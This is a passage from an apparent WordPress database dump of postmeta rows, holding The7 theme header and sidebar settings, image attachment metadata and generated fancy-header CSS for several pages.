(29512,3914,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29513,3916,'_edit_lock','1694431087:1'),
(29514,3917,'_wp_attached_file','2023/03/w295.jpg'),
(29515,3917,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:113;s:6:\"height\";i:125;s:4:\"file\";s:16:\"2023/03/w295.jpg\";s:8:\"filesize\";i:4245;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29516,3916,'_thumbnail_id','3917'),
(29517,3916,'_edit_last','1'),
(29518,3916,'_dt_sidebar_position','disabled'),
(29519,3916,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29520,3916,'_dt_sidebar_hide_on_mobile','0'),
(29521,3916,'_dt_footer_show','0'),
(29522,3916,'_dt_footer_widgetarea_id','sidebar_2'),
(29523,3916,'_dt_footer_hide_on_mobile','0'),
(29524,3916,'_dt_header_title','fancy'),
(29525,3916,'_dt_header_background','normal'),
(29526,3916,'_dt_header_background_below_slideshow','disabled'),
(29527,3916,'_dt_header_transparent_bg_color_scheme','light'),
(29528,3916,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29529,3916,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29530,3916,'_dt_header_transparent_bg_color','#000000'),
(29531,3916,'_dt_header_transparent_bg_opacity','50'),
(29532,3916,'_dt_header_disabled_background','normal'),
(29533,3916,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29534,3916,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29535,3916,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29536,3916,'_dt_header_disabled_transparent_bg_color','#000000'),
(29537,3916,'_dt_header_disabled_transparent_bg_opacity','50'),
(29538,3916,'_dt_page_overrides_top_margin',''),
(29539,3916,'_dt_page_overrides_right_margin',''),
(29540,3916,'_dt_page_overrides_bottom_margin',''),
(29541,3916,'_dt_page_overrides_left_margin',''),
(29542,3916,'_dt_mobile_page_padding_top',''),
(29543,3916,'_dt_mobile_page_padding_right',''),
(29544,3916,'_dt_mobile_page_padding_bottom',''),
(29545,3916,'_dt_mobile_page_padding_left',''),
(29546,3916,'_dt_fancy_header_layout_heading',''),
(29547,3916,'_dt_fancy_header_title_aligment','center'),
(29548,3916,'_dt_fancy_header_height','300'),
(29549,3916,'_dt_fancy_header_padding-top','0px'),
(29550,3916,'_dt_fancy_header_padding-bottom','0px'),
(29551,3916,'_dt_fancy_header_breadcrumbs_heading',''),
(29552,3916,'_dt_fancy_header_breadcrumbs','disabled'),
(29553,3916,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29554,3916,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29555,3916,'_dt_fancy_header_title_heading',''),
(29556,3916,'_dt_fancy_header_title_mode','generic'),
(29557,3916,'_dt_fancy_header_title',''),
(29558,3916,'_dt_fancy_header_title_font_size','30'),
(29559,3916,'_dt_fancy_header_title_line_height','36'),
(29560,3916,'_dt_fancy_header_text_transform','none'),
(29561,3916,'_dt_fancy_header_title_color_mode','color'),
(29562,3916,'_dt_fancy_header_title_color','#ffffff'),
(29563,3916,'_dt_fancy_header_subtitle_heading',''),
(29564,3916,'_dt_fancy_header_subtitle',''),
(29565,3916,'_dt_fancy_header_subtitle_font_size','18'),
(29566,3916,'_dt_fancy_header_subtitle_line_height','26'),
(29567,3916,'_dt_fancy_header_subtitle_text_transform','none'),
(29568,3916,'_dt_fancy_header_subtitle_color_mode','color'),
(29569,3916,'_dt_fancy_header_subtitle_color','#ffffff'),
(29570,3916,'_dt_fancy_header_bg_heading',''),
(29571,3916,'_dt_fancy_header_bg_color','#222222'),
(29572,3916,'_dt_fancy_header_bg_image_origin','custom'),
(29573,3916,'_dt_fancy_header_bg_image','a:0:{}'),
(29574,3916,'_dt_fancy_header_bg_repeat','no-repeat'),
(29575,3916,'_dt_fancy_header_bg_position_x','center'),
(29576,3916,'_dt_fancy_header_bg_position_y','center'),
(29577,3916,'_dt_fancy_header_bg_fullscreen','1'),
(29578,3916,'_dt_fancy_header_bg_overlay','0'),
(29579,3916,'_dt_fancy_header_overlay_color','#000'),
(29580,3916,'_dt_fancy_header_bg_overlay_opacity','50'),
(29581,3916,'_dt_fancy_header_scroll_effect','default'),
(29582,3916,'_dt_fancy_header_bg_parallax','0.5'),
(29583,3916,'_dt_fancy_header_responsiveness_heading',''),
(29584,3916,'_dt_fancy_header_responsiveness','disabled'),
(29585,3916,'_dt_fancy_header_responsiveness_switch','778px'),
(29586,3916,'_dt_fancy_header_responsive_height','70'),
(29587,3916,'_dt_fancy_header_responsive_font_size','30'),
(29588,3916,'_dt_fancy_header_responsive_title_line_height','38'),
(29589,3916,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29590,3916,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29591,3916,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29592,3916,'_dt_teammate_options_go_to_single','1'),
(29593,3916,'_dt_teammate_options_position',''),
(29594,3916,'_dt_teammate_options_website',''),
(29595,3916,'_dt_teammate_options_mail',''),
(29596,3916,'_dt_teammate_options_facebook',''),
(29597,3916,'_dt_teammate_options_twitter',''),
(29598,3916,'_dt_teammate_options_dribbble',''),
(29599,3916,'_dt_teammate_options_you-tube',''),
(29600,3916,'_dt_teammate_options_rss',''),
(29601,3916,'_dt_teammate_options_delicious',''),
(29602,3916,'_dt_teammate_options_flickr',''),
(29603,3916,'_dt_teammate_options_lastfm',''),
(29604,3916,'_dt_teammate_options_linkedin',''),
(29605,3916,'_dt_teammate_options_vimeo',''),
(29606,3916,'_dt_teammate_options_tumbler',''),
(29607,3916,'_dt_teammate_options_pinterest',''),
(29608,3916,'_dt_teammate_options_devian',''),
(29609,3916,'_dt_teammate_options_skype',''),
(29610,3916,'_dt_teammate_options_github',''),
(29611,3916,'_dt_teammate_options_instagram',''),
(29612,3916,'_dt_teammate_options_stumbleupon',''),
(29613,3916,'_dt_teammate_options_behance',''),
(29614,3916,'_dt_teammate_options_px-500',''),
(29615,3916,'_dt_teammate_options_tripedvisor',''),
(29616,3916,'_dt_teammate_options_vk',''),
(29617,3916,'_dt_teammate_options_foursquare',''),
(29618,3916,'_dt_teammate_options_xing',''),
(29619,3916,'_dt_teammate_options_weibo',''),
(29620,3916,'_dt_teammate_options_odnoklassniki',''),
(29621,3916,'_dt_teammate_options_research-gate',''),
(29622,3916,'_dt_teammate_options_yelp',''),
(29623,3916,'_dt_teammate_options_blogger',''),
(29624,3916,'_dt_teammate_options_soundcloud',''),
(29625,3916,'_dt_teammate_options_viber',''),
(29626,3916,'_dt_teammate_options_whatsapp',''),
(29627,3916,'_dt_teammate_options_reddit',''),
(29628,3916,'_dt_teammate_options_snapchat',''),
(29629,3916,'_dt_teammate_options_telegram',''),
(29630,3916,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29631,3918,'_edit_lock','1677712173:1'),
(29632,3919,'_wp_attached_file','2023/03/w296.jpg'),
(29633,3919,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:114;s:6:\"height\";i:116;s:4:\"file\";s:16:\"2023/03/w296.jpg\";s:8:\"filesize\";i:5439;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29634,3918,'_thumbnail_id','3919'),
(29635,3918,'_edit_last','1'),
(29636,3918,'_dt_sidebar_position','disabled'),
(29637,3918,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29638,3918,'_dt_sidebar_hide_on_mobile','0'),
(29639,3918,'_dt_footer_show','0'),
(29640,3918,'_dt_footer_widgetarea_id','sidebar_2'),
(29641,3918,'_dt_footer_hide_on_mobile','0'),
(29642,3918,'_dt_header_title','fancy'),
(29643,3918,'_dt_header_background','normal'),
(29644,3918,'_dt_header_background_below_slideshow','disabled'),
(29645,3918,'_dt_header_transparent_bg_color_scheme','light'),
(29646,3918,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29647,3918,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29648,3918,'_dt_header_transparent_bg_color','#000000'),
(29649,3918,'_dt_header_transparent_bg_opacity','50'),
(29650,3918,'_dt_header_disabled_background','normal'),
(29651,3918,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29652,3918,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29653,3918,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29654,3918,'_dt_header_disabled_transparent_bg_color','#000000'),
(29655,3918,'_dt_header_disabled_transparent_bg_opacity','50'),
(29656,3918,'_dt_page_overrides_top_margin',''),
(29657,3918,'_dt_page_overrides_right_margin',''),
(29658,3918,'_dt_page_overrides_bottom_margin',''),
(29659,3918,'_dt_page_overrides_left_margin',''),
(29660,3918,'_dt_mobile_page_padding_top',''),
(29661,3918,'_dt_mobile_page_padding_right',''),
(29662,3918,'_dt_mobile_page_padding_bottom',''),
(29663,3918,'_dt_mobile_page_padding_left',''),
(29664,3918,'_dt_fancy_header_layout_heading',''),
(29665,3918,'_dt_fancy_header_title_aligment','center'),
(29666,3918,'_dt_fancy_header_height','300'),
(29667,3918,'_dt_fancy_header_padding-top','0px'),
(29668,3918,'_dt_fancy_header_padding-bottom','0px'),
(29669,3918,'_dt_fancy_header_breadcrumbs_heading',''),
(29670,3918,'_dt_fancy_header_breadcrumbs','disabled'),
(29671,3918,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29672,3918,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29673,3918,'_dt_fancy_header_title_heading',''),
(29674,3918,'_dt_fancy_header_title_mode','generic'),
(29675,3918,'_dt_fancy_header_title',''),
(29676,3918,'_dt_fancy_header_title_font_size','30'),
(29677,3918,'_dt_fancy_header_title_line_height','36'),
(29678,3918,'_dt_fancy_header_text_transform','none'),
(29679,3918,'_dt_fancy_header_title_color_mode','color'),
(29680,3918,'_dt_fancy_header_title_color','#ffffff'),
(29681,3918,'_dt_fancy_header_subtitle_heading',''),
(29682,3918,'_dt_fancy_header_subtitle',''),
(29683,3918,'_dt_fancy_header_subtitle_font_size','18'),
(29684,3918,'_dt_fancy_header_subtitle_line_height','26'),
(29685,3918,'_dt_fancy_header_subtitle_text_transform','none'),
(29686,3918,'_dt_fancy_header_subtitle_color_mode','color'),
(29687,3918,'_dt_fancy_header_subtitle_color','#ffffff'),
(29688,3918,'_dt_fancy_header_bg_heading',''),
(29689,3918,'_dt_fancy_header_bg_color','#222222'),
(29690,3918,'_dt_fancy_header_bg_image_origin','custom'),
(29691,3918,'_dt_fancy_header_bg_image','a:0:{}'),
(29692,3918,'_dt_fancy_header_bg_repeat','no-repeat'),
(29693,3918,'_dt_fancy_header_bg_position_x','center'),
(29694,3918,'_dt_fancy_header_bg_position_y','center'),
(29695,3918,'_dt_fancy_header_bg_fullscreen','1'),
(29696,3918,'_dt_fancy_header_bg_overlay','0'),
(29697,3918,'_dt_fancy_header_overlay_color','#000'),
(29698,3918,'_dt_fancy_header_bg_overlay_opacity','50'),
(29699,3918,'_dt_fancy_header_scroll_effect','default'),
(29700,3918,'_dt_fancy_header_bg_parallax','0.5'),
(29701,3918,'_dt_fancy_header_responsiveness_heading',''),
(29702,3918,'_dt_fancy_header_responsiveness','disabled'),
(29703,3918,'_dt_fancy_header_responsiveness_switch','778px'),
(29704,3918,'_dt_fancy_header_responsive_height','70'),
(29705,3918,'_dt_fancy_header_responsive_font_size','30'),
(29706,3918,'_dt_fancy_header_responsive_title_line_height','38'),
(29707,3918,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29708,3918,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29709,3918,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29710,3918,'_dt_teammate_options_go_to_single','1'),
(29711,3918,'_dt_teammate_options_position',''),
(29712,3918,'_dt_teammate_options_website',''),
(29713,3918,'_dt_teammate_options_mail',''),
(29714,3918,'_dt_teammate_options_facebook',''),
(29715,3918,'_dt_teammate_options_twitter',''),
(29716,3918,'_dt_teammate_options_dribbble',''),
(29717,3918,'_dt_teammate_options_you-tube',''),
(29718,3918,'_dt_teammate_options_rss',''),
(29719,3918,'_dt_teammate_options_delicious',''),
(29720,3918,'_dt_teammate_options_flickr',''),
(29721,3918,'_dt_teammate_options_lastfm',''),
(29722,3918,'_dt_teammate_options_linkedin',''),
(29723,3918,'_dt_teammate_options_vimeo',''),
(29724,3918,'_dt_teammate_options_tumbler',''),
(29725,3918,'_dt_teammate_options_pinterest',''),
(29726,3918,'_dt_teammate_options_devian',''),
(29727,3918,'_dt_teammate_options_skype',''),
(29728,3918,'_dt_teammate_options_github',''),
(29729,3918,'_dt_teammate_options_instagram',''),
(29730,3918,'_dt_teammate_options_stumbleupon',''),
(29731,3918,'_dt_teammate_options_behance',''),
(29732,3918,'_dt_teammate_options_px-500',''),
(29733,3918,'_dt_teammate_options_tripedvisor',''),
(29734,3918,'_dt_teammate_options_vk',''),
(29735,3918,'_dt_teammate_options_foursquare',''),
(29736,3918,'_dt_teammate_options_xing',''),
(29737,3918,'_dt_teammate_options_weibo',''),
(29738,3918,'_dt_teammate_options_odnoklassniki',''),
(29739,3918,'_dt_teammate_options_research-gate',''),
(29740,3918,'_dt_teammate_options_yelp',''),
(29741,3918,'_dt_teammate_options_blogger',''),
(29742,3918,'_dt_teammate_options_soundcloud',''),
(29743,3918,'_dt_teammate_options_viber',''),
(29744,3918,'_dt_teammate_options_whatsapp',''),
(29745,3918,'_dt_teammate_options_reddit',''),
(29746,3918,'_dt_teammate_options_snapchat',''),
(29747,3918,'_dt_teammate_options_telegram',''),
(29748,3918,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29749,3921,'_wp_attached_file','2023/03/29m2.jpg'),
(29750,3921,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:640;s:6:\"height\";i:222;s:4:\"file\";s:16:\"2023/03/29m2.jpg\";s:8:\"filesize\";i:47633;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"29m2-300x104.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:104;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7302;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"29m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5311;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"29m2-500x173.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16693;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29751,3921,'_edit_lock','1677712801:1'),
(29752,3923,'_wp_attached_file','2023/03/29m22.jpg'),
(29753,3923,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:648;s:6:\"height\";i:163;s:4:\"file\";s:17:\"2023/03/29m22.jpg\";s:8:\"filesize\";i:35414;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"29m22-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5294;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"29m22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4564;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"29m22-500x126.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:126;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11637;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29754,3928,'_edit_lock','1677921769:1'),
(29755,3929,'_wp_attached_file','2023/03/Jingbin-Liu-scaled.jpg'),
(29756,3929,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2015;s:6:\"height\";i:2560;s:4:\"file\";s:30:\"2023/03/Jingbin-Liu-scaled.jpg\";s:8:\"filesize\";i:607824;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Jingbin-Liu-236x300.jpg\";s:5:\"width\";i:236;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9536;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"Jingbin-Liu-806x1024.jpg\";s:5:\"width\";i:806;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94253;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Jingbin-Liu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4183;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"Jingbin-Liu-768x976.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85195;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"Jingbin-Liu-1209x1536.jpg\";s:5:\"width\";i:1209;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219956;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"Jingbin-Liu-1612x2048.jpg\";s:5:\"width\";i:1612;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:393097;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:23:\"Jingbin-Liu-500x635.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:635;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35930;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:24:\"Jingbin-Liu-800x1016.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:1016;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93092;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:25:\"Jingbin-Liu-1280x1626.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1626;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247953;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:25:\"Jingbin-Liu-1920x2439.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:2439;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:553873;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1655459949\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:15:\"Jingbin-Liu.jpg\";}'),
(29757,3928,'_thumbnail_id','3929'),
(29758,3928,'_edit_last','1'),
(29759,3928,'_dt_sidebar_position','disabled'),
(29760,3928,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29761,3928,'_dt_sidebar_hide_on_mobile','0'),
(29762,3928,'_dt_footer_show','0'),
(29763,3928,'_dt_footer_widgetarea_id','sidebar_2'),
(29764,3928,'_dt_footer_hide_on_mobile','0'),
(29765,3928,'_dt_header_title','fancy'),
(29766,3928,'_dt_header_background','normal'),
(29767,3928,'_dt_header_background_below_slideshow','disabled'),
(29768,3928,'_dt_header_transparent_bg_color_scheme','light'),
(29769,3928,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29770,3928,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29771,3928,'_dt_header_transparent_bg_color','#000000'),
(29772,3928,'_dt_header_transparent_bg_opacity','50'),
(29773,3928,'_dt_header_disabled_background','normal'),
(29774,3928,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29775,3928,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29776,3928,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29777,3928,'_dt_header_disabled_transparent_bg_color','#000000'),
(29778,3928,'_dt_header_disabled_transparent_bg_opacity','50'),
(29779,3928,'_dt_page_overrides_top_margin',''),
(29780,3928,'_dt_page_overrides_right_margin',''),
(29781,3928,'_dt_page_overrides_bottom_margin',''),
(29782,3928,'_dt_page_overrides_left_margin',''),
(29783,3928,'_dt_mobile_page_padding_top',''),
(29784,3928,'_dt_mobile_page_padding_right',''),
(29785,3928,'_dt_mobile_page_padding_bottom',''),
(29786,3928,'_dt_mobile_page_padding_left',''),
(29787,3928,'_dt_fancy_header_layout_heading',''),
(29788,3928,'_dt_fancy_header_title_aligment','center'),
(29789,3928,'_dt_fancy_header_height','300'),
(29790,3928,'_dt_fancy_header_padding-top','0px'),
(29791,3928,'_dt_fancy_header_padding-bottom','0px'),
(29792,3928,'_dt_fancy_header_breadcrumbs_heading',''),
(29793,3928,'_dt_fancy_header_breadcrumbs','disabled'),
(29794,3928,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29795,3928,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29796,3928,'_dt_fancy_header_title_heading',''),
(29797,3928,'_dt_fancy_header_title_mode','generic'),
(29798,3928,'_dt_fancy_header_title',''),
(29799,3928,'_dt_fancy_header_title_font_size','30'),
(29800,3928,'_dt_fancy_header_title_line_height','36'),
(29801,3928,'_dt_fancy_header_text_transform','none'),
(29802,3928,'_dt_fancy_header_title_color_mode','color'),
(29803,3928,'_dt_fancy_header_title_color','#ffffff'),
(29804,3928,'_dt_fancy_header_subtitle_heading',''),
(29805,3928,'_dt_fancy_header_subtitle',''),
(29806,3928,'_dt_fancy_header_subtitle_font_size','18'),
(29807,3928,'_dt_fancy_header_subtitle_line_height','26'),
(29808,3928,'_dt_fancy_header_subtitle_text_transform','none'),
